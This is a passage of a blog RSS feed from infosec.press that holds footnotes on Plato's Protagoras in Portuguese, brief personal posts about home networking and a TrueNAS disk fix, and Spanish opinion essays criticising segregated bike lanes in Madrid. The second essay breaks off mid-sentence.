Górgias, o personagem Górgias diz que a retórica não deve ser acusada se for usada de forma errada, um argumento repetido mais tarde por Isócrates (Antídose 252) e Aristóteles (Retórica 1355b3–7). Aqui, Protágoras afirma que corpos saudáveis são úteis para servir pensamentos saudáveis, e ele não convida a possibilidade de serem úteis para más ações.</p></div>   <div class="footdef"><sup><a id="fn.17" class="footnum" href="#fnr.17" rel="nofollow">17</a></sup> <p class="footpara">Este é o argumento de Sócrates na Apologia (25c–26a), onde ele afirma que nunca intencionalmente prejudicaria outra pessoa porque tornaria a sociedade pior e, portanto, como membro da sociedade, tornaria sua própria vida pior. Todo criminoso, é claro, poderia usar o mesmo argumento. O problema com o argumento surge da suposição de que as pessoas estão sempre agindo racionalmente ou sem erro nos pressupostos.</p></div>  <div class="footdef"><sup><a id="fn.18" class="footnum" href="#fnr.18" rel="nofollow">18</a></sup> <p class="footpara">Em 421–420 a.C.E., o dramaturgo cômico Pherecrates produziu Os Homens Selvagens, que sobrevive em muito poucos fragmentos. Hermann Sauppe sugere que os &#39;homens selvagens&#39; se assemelhavam aos ciclopes de Homero em sua barbaridade. Pouco se sabe sobre Pherecrates, que se diz ter vencido sua primeira competição em 438 e ter composto vinte e uma comédias. O que parece claro é que a peça abordou, em forma cômica, o debate sobre natureza e convenção, mostrando mais uma vez que a comédia, como os diálogos de Platão — e como a nossa comédia contemporânea — se sentia à vontade para zombar de debates intelectuais.</p></div>  <div class="footdef"><sup><a id="fn.19" class="footnum" href="#fnr.19" rel="nofollow">19</a></sup> <p class="footpara">Segundo a Suída, uma compilação do século X d.C. de coleções anteriores de dados, a única fonte de informação sobre esses homens, Eurybatos era um homem perverso que foi enviado por Crésus com dinheiro em uma embaixada e traiu Crésus, indo para Ciro, o inimigo de Crésus. Phrynondas era um indivíduo igualmente perverso.</p></div> <div class="footdef"><sup><a id="fn.20" class="footnum" href="#fnr.20" rel="nofollow">20</a></sup> <p class="footpara">Aristóteles, na Ética a Nicômaco (1164a25), parece confirmar o método de pagamento de Protágoras, mas é, claro, possível que Aristóteles tenha aprendido isso do diálogo presente. Aristóteles cita Hesíodo como tendo estabelecido a prática. Em Os Trabalhos e os Dias (370), Hesíodo cantou: &#39;Que o salário seja suficiente&#39;.</p></div> <div class="footdef"><sup><a id="fn.21" class="footnum" href="#fnr.21" rel="nofollow">21</a></sup> <p class="footpara">Para a audiência de Platão, se as histórias contadas por Plutarco (Vida de Péricles 36) já eram conhecidas, essas palavras estariam cheias de ironia dramática. Xanthippus, segundo Plutarco, o filho legítimo mais velho de Péricles, casou-se com uma esposa jovem e gastadora, e se ressentiu amargamente dos modos avarentos de seu pai. Assim, ele pegou emprestado dinheiro de um dos amigos de seu pai, alegando falsamente que estava fazendo isso a pedido de Péricles. Quando Péricles não apenas se recusou a pagar o homem de volta, mas o processou, Xanthippus ficou furioso e começou a denegrir seu pai, acusando-o de indiscrições com a esposa de Xanthippus e afirmando que Péricles desperdiçou seu tempo discutindo com Protágoras sobre se um homem morto por um lançamento acidental de uma lança foi morto pelo lançador ou pela lança. Xanthippus e seu pai nunca reconciliaram sua briga, e Xanthippus morreu na praga pouco antes de seu pai. Plutarco também relata que, quando o único filho sobrevivente de Péricles, Paralus, morreu, Péricles, embora normalmente não chorasse nos funerais de seus parentes mais próximos, durante o funeral de Paralus rompeu em um choro descontrolado pela primeira vez em sua vida. Assim, o Protágoras de Platão termina seu discurso, então, com uma nota de triste ironia.</p></div>      </div>    </div>
<a href="https://infosec.exchange/@siriuss/113896667485777369" rel="nofollow">Link</a> para comentários.</p>

<p>#Filosofia #Protágoras #Platão #Prometheus #Socrates</p>
]]></content:encoded>
      <author>Sirius</author>
      <guid>https://infosec.press/read/a/l1v673mk76</guid>
      <pubDate>Sun, 26 Jan 2025 20:53:23 +0000</pubDate>
    </item>
    <item>
      <title>So Today I Worked On.. Getting VLANs to Work</title>
      <link>https://infosec.press/pub-struct-mudd/so-today-i-worked-on-jdky</link>
      <description>&lt;![CDATA[So Today I Worked On.. Getting VLANs to Work&#xA;&#xA;I think.  I&#39;m getting a Ubiquiti-heavy network set up but not wanting to spend gazillions of dollars on Ubiquiti hardware, when I have a perfectly functioning home router set up already.  The issue is getting VLAN IoT separation going without a managed switch.  I think I know a way to do it but that will be a later tonight thing.  Hopefully I don&#39;t royally screw up the network installation because it&#39;ll be a pain to get going again.&#xA;&#xA;#VLAN #Ubiquiti #OhGodsOhNo #Network]]&gt;</description>
      <content:encoded><![CDATA[<p>So Today I Worked On.. Getting VLANs to Work</p>

<p>I think.  I&#39;m getting a Ubiquiti-heavy network set up but not wanting to spend gazillions of dollars on Ubiquiti hardware, when I have a perfectly functioning home router set up already.  The issue is getting VLAN IoT separation going without a managed switch.  I think I know a way to do it but that will be a later tonight thing.  Hopefully I don&#39;t royally screw up the network installation because it&#39;ll be a pain to get going again.</p>

<p>#VLAN #Ubiquiti #OhGodsOhNo #Network</p>
]]></content:encoded>
      <author>pub struct Mudd { }</author>
      <guid>https://infosec.press/read/a/ys5daq1rri</guid>
      <pubDate>Wed, 22 Jan 2025 17:47:19 +0000</pubDate>
    </item>
    <item>
      <title>So Today I Worked On.. Forgetting it was Tuesday</title>
      <link>https://infosec.press/pub-struct-mudd/so-today-i-worked-on-pm37</link>
      <description>&lt;![CDATA[So Today I Worked On.. Forgetting it was Tuesday&#xA;&#xA;When you have lunch plans for people on Wednesday, make sure the day is actually Wednesday before you get ready to go meet them and wonder why you haven&#39;t heard from them yet today.  It&#39;s been a very long year these last few days.]]&gt;</description>
      <content:encoded><![CDATA[<p>So Today I Worked On.. Forgetting it was Tuesday</p>

<p>When you have lunch plans for people on Wednesday, make sure the day is actually Wednesday before you get ready to go meet them and wonder why you haven&#39;t heard from them yet today.  It&#39;s been a very long year these last few days.</p>
]]></content:encoded>
      <author>pub struct Mudd { }</author>
      <guid>https://infosec.press/read/a/5e5olc12ri</guid>
      <pubDate>Tue, 21 Jan 2025 16:22:28 +0000</pubDate>
    </item>
    <item>
      <title>So Today I Worked On.. TrueNAS</title>
      <link>https://infosec.press/pub-struct-mudd/so-today-i-worked-on-hvj8</link>
      <description>&lt;![CDATA[So Today I Worked On.. TrueNAS&#xA;&#xA;I had an error that a disk of mine was incorrectly sized and it ACCUSED me of resizing and disk that it was using and all the volume information was incorrect.  I mean, it was probably correct anyway.  &#34;Device has size of xxx sectors which is smaller than corresponding PV size of xxx sectors. Was device resized?&#34; and all.  Turned out, for me thankfully, a simple &#34;pvresize /dev/nvmedisk&#34; fixed the error so I don&#39;t have to worry about it.&#xA;&#xA;#TrueNAS #NAS]]&gt;</description>
      <content:encoded><![CDATA[<p>So Today I Worked On.. TrueNAS</p>

<p>I had an error that a disk of mine was incorrectly sized and it ACCUSED me of resizing and disk that it was using and all the volume information was incorrect.  I mean, it was probably correct anyway.  “Device has size of xxx sectors which is smaller than corresponding PV size of xxx sectors. Was device resized?” and all.  Turned out, for me thankfully, a simple “pvresize /dev/nvmedisk” fixed the error so I don&#39;t have to worry about it.</p>

<p>#TrueNAS #NAS</p>
]]></content:encoded>
      <author>pub struct Mudd { }</author>
      <guid>https://infosec.press/read/a/wa03rykqat</guid>
      <pubDate>Mon, 20 Jan 2025 17:45:55 +0000</pubDate>
    </item>
    <item>
      <title>Sobre el pensamiento único ciclista y sus alternativas</title>
      <link>https://infosec.press/ideas/sobre-el-pensamiento-unico-ciclista-y-sus-alternativas</link>
      <description>&lt;![CDATA[img br/&#xA;En relación con la línea de pensamiento único mediática y política muy extendida actualmente, ligada a la manera de entender la #bicicleta y su utilización en un entorno urbano, consistente en negar toda discrepancia o comportamiento alternativo. !--more-- br/&#xA;Este pensamiento único pretende relacionarse, en el contexto de emergencia climática y sanitaria actual, con la necesidad urgente de fomentar desde hoy mismo modos sostenibles de desplazamiento que sean respetuosos y responsables. El uso de la bicicleta como vehículo habitual en ciudad es una parte esencial de la solución a estos desafíos, y una línea de pensamiento único como la que pretende imponerse pone en riesgo su implantación como alternativa segura y libre. br/&#xA;Madrid no puede perder la oportunidad y quedarse paralizada y anclada en modelos de movilidad del siglo pasado diseñados en torno al vehículo a motor, como ocurre en otras ciudades, inspirados en la idea de la bicicleta como vehículo residual, de segunda categoría frente los demás y al que hay que apartar del tráfico regular para que “no entorpezca”. Sin embargo, existe desde hace años una línea de pensamiento único que persigue la opción de crear vías ciclistas segregadas en una ciudad donde ya es posible usar la bicicleta como vehículo habitual, deslegitimando su uso libre y expulsando a los ciclistas de la circulación. La segregación únicamente puede ir encaminada a favorecer a una parte de los usuarios del espacio público, los vehículos a motor privados, con mayor velocidad punta. Así por ejemplo, muchas vías segregadas se crean en lugares de fuerte pendiente) -donde los vehículos a motor sufren más tras una bicicleta-, aún en detrimento de la seguridad del ciclista e incluso del transporte público. Son precisamente los vehículos a motor quienes, desde hace décadas​ y en sintonía con el pensamiento único, potencian la idea de una calzada desprotegida y peligrosa, de cara a apropiársela a través de la segregación ciclista. br/&#xA;Hay que recordar que la creación de vías segregadas no permite mantener la distancia de seguridad recomendada debido a la pandemia, como señala un documento de la Asociación Nacional de Búsqueda y Salvamento, recomendación en línea con otras ya emitidas por el Ministerio de Sanidad. Pese a las numerosas declaraciones políticas en favor de las vías segregadas por parte del Ayuntamiento de Madrid, la realidad es tozuda y confirma lo contrario. A pesar de los centenares de kilómetros de vías segregadas existentes y de otras muchas creadas recientemente, criticadas por las organizaciones ciclistas por penalizar tanto a los usuarios de transporte público como a los peatones, poniendo en riesgo a los ciclistas, esto no ha ayudado a facilitar el uso de la bicicleta en Madrid. Los ataques a la movilidad ciclista libre son continuos: fruto de la línea de pensamiento único dominante, 167 km más de vías segregadas han sido anunciados recientemente [2]​. br/&#xA;Como alternativa real y atractiva de movilidad que es, la bicicleta es utilizada como medio de transporte económico y eficiente por muchos madrileños todos los días gracias a su Ordenanza de Movilidad, pionera en igualar en derechos y deberes a los ciclistas con el resto de conductores. Pero esto no es suficiente, y es necesario hacer mucho más: una apuesta decidida a favor de la bicicleta en la ciudad de Madrid implica necesariamente crear programas sistemáticos de formación sobre circulación, así como campañas de sensibilización al uso de la bicicleta, que fomenten el respeto entre todos los usuarios del espacio público. Si se quiere potenciar la concepción de la bicicleta como vehículo en igualdad de condiciones respecto a los demás, sería fundamental impulsar los servicios de bicicleta compartida pública, extendiendo su implantación a toda la ciudad y aumentando su plantilla de trabajadores de manera proporcional. Mejorar el estado del asfaltado en la ciudad de cara a mejorar la seguridad, adaptando los ciclos semafóricos a la velocidad de los ciclistas son dos medidas que mejorarían sensiblemente el uso de la bicicleta en Madrid. En fin, popularizar los talleres de iniciación a la circulación en bicicleta desde las administraciones, como ya hacen las organizaciones ciclistas, supondría un impulso decisivo a la hora de hacer de Madrid una ciudad mas ciclista. br/&#xA;Es evidente que, de cara a favorecer los modos sostenibles de movilidad libres, mejorando además la salud y la calidad de vida de los ciudadanos de Madrid, sería necesario reducir de manera efectiva el tráfico de vehículos a motor en la ciudad, que ahoga la circulación y penaliza el uso de la bicicleta como vehículo eficiente. Esta reducción debería desarrollarse en paralelo a la adopción de medidas, compatibles con el uso de la bicicleta, y sanciones que impongan el respeto de la velocidad máxima permitida, donde además sería importante mantener al menos un carril a 30 km/h en calzadas de mas de un carril por sentido. br/&#xA;Todas estas medidas, como se puede fácilmente entender, son sencillas de aplicar y de fácil y rápida implantación, además de austeras, pero son obviadas por el pensamiento único, que insiste machaconamente en la misma falacia. Todas ellas potenciarían el uso de la bicicleta como vehículo habitual en la ciudad de Madrid, favoreciendo su uso a partir de la formación, la concienciación y la práctica. Cabe por ultimo señalar que la reciente supresión de la regla de gasto de los ayuntamientos, así como los previsibles fondos europeos para la recuperación, podrían llevar a pensar que la cuestión económica en ningún caso supondría una excusa para implantar costosas vías segregadas, de acuerdo con el pensamiento único ciclista. Muy al contrario, esto implicaría un dispendio económico inaceptable en estos momentos de fragilidad económica, además de suponer una clara degradación en la situación de los actuales usuarios de la bicicleta en Madrid, entendida no como un elemento puntual de segunda categoría, sino como agente de movilidad urbano moderno, sostenible y libre. br/]]&gt;</description>
      <content:encoded><![CDATA[<p><img src="https://git.sr.ht/~csantosb/csbwiki/blob/master/pics/pensamiento-unico-ciclista.png" alt="img"> <br/>
En relación con la línea de pensamiento único <a href="https://elpais.com/clima-y-medio-ambiente/2020-10-27/carriles-bici-la-respuesta-de-las-ciudades-ante-la-pandemia.html" rel="nofollow">mediática</a> y <a href="https://www.lavanguardia.com/politica/20201027/4946858797/la-oposicion-pide-a-almeida-que-cree-167-kilometros-de-carril-bici-este-ano.html" rel="nofollow">política</a> muy extendida actualmente, ligada a la manera de entender la #bicicleta y su utilización en un entorno urbano, consistente en negar toda discrepancia o comportamiento alternativo.  <br/>
Este pensamiento único pretende relacionarse, en el contexto de emergencia climática y sanitaria actual, con la necesidad urgente de fomentar desde hoy mismo modos sostenibles de desplazamiento que sean respetuosos y responsables. El uso de la bicicleta como vehículo habitual en ciudad es una parte esencial de la solución a estos desafíos, y una línea de pensamiento único como la que pretende imponerse pone en riesgo su implantación como alternativa <a href="https://infosec.press/ideas/tag:ciclismourbanolibre" rel="nofollow">segura y libre</a>. <br/>
Madrid no puede perder la oportunidad y quedarse paralizada y anclada en modelos de movilidad del siglo pasado diseñados en torno al vehículo a motor, como ocurre en otras ciudades, inspirados en la idea de la bicicleta como vehículo residual, de segunda categoría frente los demás y al que hay que apartar del tráfico regular para que <a href="https://twitter.com/csantosb/status/1345104768767823872" rel="nofollow">“no entorpezca”</a>. Sin embargo, existe desde hace años una línea de pensamiento único que persigue la opción de crear vías ciclistas <a href="https://infosec.press/ideas/neoliberalismo-y-segregacion" rel="nofollow">segregadas</a> en una ciudad donde ya es posible usar la bicicleta <a href="https://twitter.com/csantosb/status/1338618249358028804" rel="nofollow">como vehículo habitual</a>, deslegitimando su uso libre y <a href="https://twitter.com/csantosb/status/1347821301084385280" rel="nofollow">expulsando a los ciclistas</a> de la circulación. La <a href="https://infosec.press/ideas/neoliberalismo-y-segregacion" rel="nofollow">segregación</a> únicamente puede ir encaminada a favorecer a una parte de los usuarios del espacio público, los vehículos a motor privados, con mayor velocidad punta. Así por ejemplo, muchas vías segregadas se crean en <a href="https://www.enbicipormadrid.es/2020/12/nuevo-carril-bici-en-alcala-desde.html?utm_source=feedburner&amp;utm_medium=feed&amp;utm_campaign=Feed:+EnBiciPorMadrid+(en+bici+por+madrid)" rel="nofollow">lugares de fuerte pendiente</a> -donde los vehículos a motor sufren más tras una bicicleta-, aún <a href="https://twitter.com/csantosb/status/1341682652882079744" rel="nofollow">en detrimento de la seguridad del ciclista</a> e incluso del transporte público. Son precisamente los vehículos a motor quienes, desde <a href="https://infosec.press/ideas/el-origen-del-problema" rel="nofollow">hace décadas​</a> y en sintonía con el pensamiento único, potencian la idea de una calzada desprotegida y peligrosa, de cara a apropiársela a través de la <a href="https://www.instagram.com/p/CISaioJh3H1/?igshid=17ij9vlojk30x" rel="nofollow">segregación ciclista</a>. <br/>
Hay que recordar que la creación de vías segregadas no permite mantener la distancia de seguridad recomendada debido a la pandemia, como señala un documento de la <a href="http://madridciclista.org/entrevista-a-manuel-jabalera-coautor-del-informe-de-recomendaciones-para-la-desescalada-por-el-coronavirus/" rel="nofollow">Asociación Nacional de Búsqueda y Salvamento</a>, recomendación en línea con otras ya emitidas por el Ministerio de Sanidad. Pese a las numerosas declaraciones políticas en favor de las vías segregadas por parte del Ayuntamiento de Madrid, la realidad es tozuda y confirma lo contrario. A pesar de los centenares de kilómetros de vías segregadas existentes y de otras muchas creadas recientemente, criticadas por las organizaciones ciclistas por penalizar tanto a los usuarios de transporte público como a los peatones, <a href="https://twitter.com/csantosb/status/1341682652882079744" rel="nofollow">poniendo en riesgo a los ciclistas</a>, esto no ha ayudado a facilitar el uso de la bicicleta en Madrid. Los <a href="https://twitter.com/locodelpelorojo/status/989558349971755008" rel="nofollow">ataques a la movilidad ciclista libre</a> son continuos: fruto de la línea de pensamiento único dominante, 167 km más de vías segregadas han sido anunciados recientemente <a href="https://www.lavanguardia.com/politica/20201027/4946858797/la-oposicion-pide-a-almeida-que-cree-167-kilometros-de-carril-bici-este-ano.html" rel="nofollow">[2]​</a>. <br/>
Como alternativa real y atractiva de movilidad que es, la bicicleta es utilizada como medio de transporte económico y eficiente por muchos madrileños todos los días gracias a su <a href="https://sede.madrid.es/portal/site/tramites/menuitem.5dd4485239c96e10f7a72106a8a409a0/?vgnextoid=5ccdb732cef96610VgnVCM2000001f4a900aRCRD&amp;vgnextchannel=6b3d814231ede410VgnVCM1000000b205a0aRCRD&amp;vgnextfmt=default" rel="nofollow">Ordenanza de Movilidad</a>, pionera en igualar en derechos y deberes a los ciclistas con el resto de conductores. Pero esto no es suficiente, y es necesario <a href="http://madridciclista.org/sobre-madrid-ciclista/" rel="nofollow">hacer mucho más</a>: una apuesta decidida a favor de la bicicleta en la ciudad de Madrid implica necesariamente crear <em>programas sistemáticos de formación</em> sobre circulación, así como <a href="https://twitter.com/csantosb/status/1341817733575487489" rel="nofollow"><em>campañas de sensibilización</em></a> al uso de la bicicleta, que fomenten el respeto entre todos los usuarios del espacio público. Si se quiere potenciar la concepción de la bicicleta como vehículo en igualdad de condiciones respecto a los demás, sería fundamental <em>impulsar los servicios de bicicleta compartida pública</em>, extendiendo su implantación a toda la ciudad y aumentando su plantilla de trabajadores de manera proporcional. <em>Mejorar el estado del asfaltado</em> en la ciudad de cara a mejorar la seguridad, <em>adaptando los ciclos semafóricos</em> a la velocidad de los ciclistas son dos medidas que mejorarían sensiblemente el uso de la bicicleta en Madrid. En fin, <em>popularizar los talleres de iniciación</em> a la circulación en bicicleta desde las administraciones, como <a href="http://madridciclista.org/mujeres-en-bici-mujeres-sin-limite/" rel="nofollow">ya hacen</a> las organizaciones ciclistas, supondría un impulso decisivo a la hora de hacer de Madrid una ciudad mas ciclista. <br/>
Es evidente que, de cara a favorecer los modos sostenibles de movilidad libres, mejorando además la salud y la calidad de vida de los ciudadanos de Madrid, sería necesario <em>reducir de manera efectiva el tráfico de vehículos a motor en la ciudad</em>, que ahoga la circulación y <a href="http://madridciclista.org/espacio-publico-peatones-ciclistas-toma-calzada/" rel="nofollow">penaliza</a> el uso de la bicicleta como vehículo eficiente. Esta reducción debería desarrollarse en paralelo a la adopción de medidas, compatibles con el uso de la bicicleta, y sanciones que impongan el <em>respeto de la velocidad máxima permitida</em>, donde además sería importante <em>mantener al menos un carril a 30 km/h</em> en calzadas de mas de un carril por sentido. <br/>
Todas estas medidas, como se puede fácilmente entender, son sencillas de aplicar y de fácil y rápida implantación, además de austeras, pero son obviadas por el pensamiento único, que insiste machaconamente en la misma <a href="https://twitter.com/jlgalego/status/1346757235951755266" rel="nofollow">falacia</a>. Todas ellas potenciarían el uso de la bicicleta como vehículo habitual en la ciudad de Madrid, favoreciendo su uso a partir de la formación, la concienciación y la práctica. Cabe por ultimo señalar que la reciente supresión de la regla de gasto de los ayuntamientos, así como los previsibles fondos europeos para la recuperación, podrían llevar a pensar que la cuestión económica en ningún caso supondría una excusa para implantar costosas vías segregadas, de acuerdo con el pensamiento único ciclista. Muy al contrario, esto implicaría <a href="https://www.abc.es/espana/madrid/abci-almeida-invertira-70-millones-2021-obras-incluyen-carriles-bici-y-ciclocarriles-202012020100_noticia.html" rel="nofollow">un dispendio</a> económico inaceptable en estos momentos de fragilidad económica, además de suponer una clara degradación en la situación de los actuales usuarios de la bicicleta en Madrid, entendida no como un elemento puntual de segunda categoría, sino como agente de movilidad urbano moderno, sostenible y <a href="https://infosec.press/ideas/tag:ciclismourbanolibre" rel="nofollow">libre</a>. <br/></p>
]]></content:encoded>
      <author>ideas</author>
      <guid>https://infosec.press/read/a/reuh5cav5f</guid>
      <pubDate>Sat, 18 Jan 2025 16:01:21 +0000</pubDate>
    </item>
    <item>
      <title>Sobre el ciclismo urbano libre (iii)</title>
      <link>https://infosec.press/ideas/sobre-el-ciclismo-urbano-libre-iii</link>
      <description>&lt;![CDATA[img br/&#xA;Las dos primeras partes (i, ii) de este artículo se han centrado en la definición de lo que constituyen los modelos libre y propietario genéricos, presentando con algún detalle ejemplos de ambos. Compartiendo características comunes, ciertos modelos propietarios se imponen hoy día de forma mayoritaria remplazando a sus modelos libres respectivos, predominantes en un principio. Un claro ejemplo lo constituye el caso del espacio público entendido como bien común colectivo. A partir de este último, es posible desarrollar una teoría razonada sobre el caso particular de la bicicleta entendida como vehículo urbano libre, objetivo último de este artículo, desarrollando las implicaciones que conlleve el modelo propietario que se derive. !--more-- br/&#xA;Articulo Sobre ciclismo urbano libre br/&#xA;&#xA;Modelos de ciclismo urbano libre y propietario&#xA;&#xA;Un último ejemplo de modelo, muy relacionado con el anterior, lo constituye el modelo de ciclismo urbano libre (y por oposición, su modelo equivalente propietario). Este modelo se relaciona con la utilización de la bicicleta en tanto que medio de transporte urbano sostenible, seguro y económico. Es por ello que este modelo se asocia de manera inmediata con el modelo de espacio público libre anterior, siendo un derivado o consecuencia de éste último, predominantes ambos en las ciudades antes de la implantación de sus modelos propietarios respectivos. br/&#xA;&#xA;Modelo ciclista libre&#xA;&#xA;img br/&#xA;Desde la perspectiva de este artículo, el modelo de ciclismo urbano libre (o modelo ciclista libre por simplificar en este contexto) se podría definir de forma resumida como aquel que sostiene la posibilidad real de todo ciclista de conseguir desplazarse de manera práctica, eficiente y segura, libremente por toda la ciudad. Este modelo observa a la bicicleta como vehículo de empleo diario de primera categoría, en igualdad de condiciones con el resto de vehículos, y no como un accesorio marginal de segundo nivel, de uso puntual o lucrativo-festivo. La noción de modelo ciclista libre es amplia, pero puede y debe entenderse dentro de un contexto urbano actual, donde es necesario gestionar y compartir el espacio público con los demás usuarios, incluidos tranvías, vehículos a motor, peatones, etc. Esto será así para cualquier tipo de configuración urbana habitual: plataforma única, parque, APR, calzada/acera, etc. br/&#xA;img br/&#xA;El modelo ciclista libre se basa en la capacidad de poder decidir, de manera autónoma e independiente, pero sobre todo libre, el medio de transporte más adaptado pero sobre todo, el itinerario más conveniente a las necesidades del usuario, respetando siempre a todos los demás usuarios del espacio público mediante el establecimiento de unas normas básicas comunes de convivencia en forma de prioridades, delimitación de circulación, etc. Dentro de estas regulaciones impuestas por la necesidad de compartir de forma ordenada un bien común, el espacio público, el ciclismo libre reclama la libertad de poder desplazarse sin otros condicionantes adicionales añadidos artificialmente. Cabe notar una vez más que este modelo libre, al igual que los anteriormente mencionados, ha sido mayoritario en muchas ciudades (con mayor o menor tradición ciclista) y se ha mostrado eficiente y práctico: tanto por su velocidad media, como por las distancias que se pueden llegar a cubrir, la bicicleta es un medio de transporte económico y no contaminante especialmente bien adaptado a los entornos urbanos. br/&#xA;img br/&#xA;A lo anterior cabe añadir el hecho de que una bicicleta, como vehículo habitual, comprende una mecánica y un mantenimiento lo suficientemente sencillos como para poder ser observado como un modelo abierto, en el que es relativamente sencillo aprender, intercambiar piezas y conocimientos e interactuar entre usuarios de cara a su correcto funcionamiento. En este punto en particular el paralelismo con el modelo de código libre es evidente. De la misma manera, es posible formar y acompañar de manera abierta y sencilla a nuevos ciclistas, tanto en su aprendizaje de las normas de circulación urbanas, como en cuanto al mantenimiento de su vehículo. br/&#xA;Este modelo, mayoritario en un origen en las ciudades, legitima al ciclista y le permite circular libremente por toda la ciudad, siendo habitual observar la cohabitación pacifica de ciclistas, peatones y medios de transporte público eléctricos, junto a la presencia de escasos vehículos a motor individuales. Al tratarse de un vehículo poco voluminoso y eficiente, que permite recorrer cómodamente distancias habituales en un entorno urbano, la bicicleta se impone naturalmente como una alternativa convivial y agradable que permite al ciclista circular por la calzada en toda libertad. En ningún momento se plantea la necesidad de limitar artificialmente los desplazamientos ciclistas. Sin embargo, al igual que en el caso de los modelos de código y de espacio público libres, el modelo ciclista libre ha sido hoy en día remplazado: frente al modelo ciclista libre se ha terminado imponiendo un modelo ciclista propietario, caracterizado por la segregación exclusivista del ciclista, que limita los desplazamientos de los ciclistas a los que expulsa de la calzada que venian ocupando hasta entonces, quedando éstos arrinconados en vías segregadas, peligrosas e ineficaces, que les sitúan fuera del trafico, obligándoles a circular y situándoles a menudo en posicion de peligro. br/&#xA;&#xA;Modelo ciclista propietario&#xA;&#xA;img br/&#xA;Este modelo propietario tiene su origen y se entiende mejor a partir de la eclosión y proliferación del vehículo a motor en las ciudades [1]​, momento en el cual estos vehículos reclaman para ellos la mayor parte del espacio publico disponible, como se pudo ver anteriormente. Al igual que los peatones y el transporte publico eléctrico, el ciclismo libre supone un serio obstáculo a la ambición desmesurada del modelo propietario del espacio publico, lo que conlleva la aparición del modelo ciclista propietario, consecuencia del primero. Si se tiene en cuenta lo expuesto previamente en este articulo, se puede entender fácilmente la necesidad de erradicar el ciclismo libre por el bien del vehículo a motor privado, como vía para la consecución de un beneficio económico inmediato indirecto. Con esta finalidad, al igual que en el caso de los dos modelos mencionados anteriormente, se recurrirá a dos recursos argumentales habituales característicos de los modelos propietarios. br/&#xA;En primer lugar, el modelo propietario se sustentará en la idea de un pensamiento único [2]​, que le proporcionará su marco de legitimidad y se propagará hasta convertirse en omnipresente, negando todo desacuerdo o modelo alternativo. Este pensamiento único tendrá como finalidad inconfundible la creación de vías ciclistas exclusivas segregadas aun en ciudades donde ya es posible usar la bicicleta como vehículo habitual, desligitimando su uso libre y expulsando a los ciclistas de la circulación. El objetivo no declarado de no “entorpecer” a los vehículos a motor, con mayor velocidad punta que no promedio, será obviado por este pensamiento único y se convertirá así en un argumento implícito incómodo, aun siendo su razón de ser original y prácticamente exclusiva. br/&#xA;img br/&#xA;Un segundo recurso argumental habitual a favor de los modelos propietarios se dará también en este caso, de manera similar a los modelos vistos anteriormente. Este recurso consiste en hacer todo lo posible por difundir la idea de una supuesta inseguridad de los adeptos al modelo ciclista libre, que deberán así plegarse y aceptar el modelo propietario por su propia protección. Esta idea, fundamentada en el hecho de no desear compartir el espacio público en calzada con coches y motos de gran cilindrada (grandes productores de contaminación sonora y ambiental, acaparadores del espacio público, productores de atascos y no respetuosos de los límites de velocidad), conduce arbitrariamente como conclusión interesada a la necesidad de construir vías exclusivas segregadas para un tipo de vehículo unicamente, la bicicleta, quien de esta manera no se vería obligada a compartir el espacio público con los demás vehículos. Siguiendo con esta lógica, se concluye que sería necesario desarrollar costosas infraestructuras y redes segregadas fuera de la calzada compartida para uso exclusivo ciclista, quienes de esta manera se verían ya incapacitados para poder circular libremente en ciudad, como han venido haciendo hasta ese momento. br/&#xA;img br/&#xA;Esta incapacitación efectiva del ciclista para poder circular libremente por la ciudad, tanto explicita por medio de paneles de obligación de uso de las vías exclusivas segregadas, como implícita a partir del acoso de los vehículos de motor en presencia de vías exclusivas segregadas, puede ser entendida como una consecuencia última inevitable del modelo ciclista propietario, pero ha de ser sobre todo comprendida como su objetivo original primero y casi exclusivo. Se obtiene así el beneficio económico inmediato indirecto de este modelo propietario: la erradicación de una “molestia” de la calzada. A menudo, se llega incluso a recurrir como único argumento a favor de la inversión en vías exclusivas segregadas la protección de sectores de la población frágiles (niños, personas mayores o con movilidad reducida, etc.), a pesar de que se observa sistemáticamente como en presencia de vías ciclistas exclusivas segregadas, resulta prácticamente imposible apreciar presencia alguna de ese tipo de población en estas vías. br/&#xA;img br/&#xA;El modelo propietario ciclista responde al comportamiento general de todo modelo propietario. Por una parte, se limitan las opciones a las que tiene acceso el usuario, quien pasa de poder circular libremente por toda la ciudad a deber hacerlo únicamente por un cierto número de vías exclusivas segregadas, allí donde no suponga una “molestia”. Se le obliga así a optar por un numero reducido de alternativas en forma de recorridos ineficientes, muy limitados, invariablemente los mismos independientemente de las necesidades particulares o el destino de cada ciclista. Por otro lado, se obvian las consecuencias del modelo, siendo tan solo relevante el beneficio económico inmediato indirecto que se pueda obtener (apartar al ciclista de la circulación). Siendo asimismo un modelo individualista y egocéntrico, implícitamente se excluye la necesidad equivalente de deber desarrollar las mismas costosas infraestructuras segregadas para todo tipo de vehículo que no deseara compartir el espacio público con los vehículos a motor. Por qué un ciclomotor no tendría el mismo privilegio? y los vehículos de movilidad personal? en caso de atascos ciclistas en la vía segregada, sería necesario crear otra vía segregada? y que sucede con los vehículos a motor que si respetan los límites de velocidad de 30 km/h? y con aquellas personas que no se consideran capacitados para circular en ciudad con otros vehículos de motor no respetuosos, pero si lo hacen en entornos más calmados? las personas mayores y los niños pequeños deberían compartir vías exclusivas ciclistas segregadas con adultos circulando a mucha mayor velocidad, poniéndoles así en peligro? sería necesaria una nueva red segregada exclusiva para cada caso? por qué unicamente en el caso de los ciclistas?. br/&#xA;De manera equivalente a la situación del modelo propietario del espacio público, la lista de agravios producida por el modelo propietario ciclista es interminable, y va siempre en detrimento de la libertad y la seguridad de las personas: imposibilidad de lograr desplazarse libremente, obligación de hacerlo siguiendo itinerarios arrinconados, perdida de eficiencia de la bicicleta como vehículo al obligarle a transitar por recorridos degradados, haciendo imposible una circulación natural, etc. [4]​. Las situaciones de riesgo a las que se expone a los ciclistas (cabe recordar en este punto el argumento segregador en favor de su supuesta seguridad) son innombrables, confinándoles en vías marginales: choques con bordillos graníticos afilados u otros obstáculos en caso de caída; obligación de posicionarse a la derecha en rotondas; posicionamiento sistemático a la derecha del flujo circulatorio en cada cruce y en consecuencia dentro del ángulo muerto de visión de los vehículos a motor; obligación de transitar por caminos estrechos, incluso bidireccionales, aumentando así la posibilidad de una colisión frontal y de invasión de carriles cercanos en caso de caída; imposibilidad de efectuar cambios de carril ni giros en función del destino; cercanía con vehículos aparcados y sus puertas; cruces continuados con trayectorias de lineas de autobús y sus paradas, etc. La lista no tiene fin: el modelo propietario y su pensamiento único asociados [3]​) obvian todo lo que no redunde en su propio beneficio. br/&#xA;img br/&#xA;El éxito del modelo propietario, desde el punto de vista del ciclista, reside al igual que en los casos anteriores en su aparente 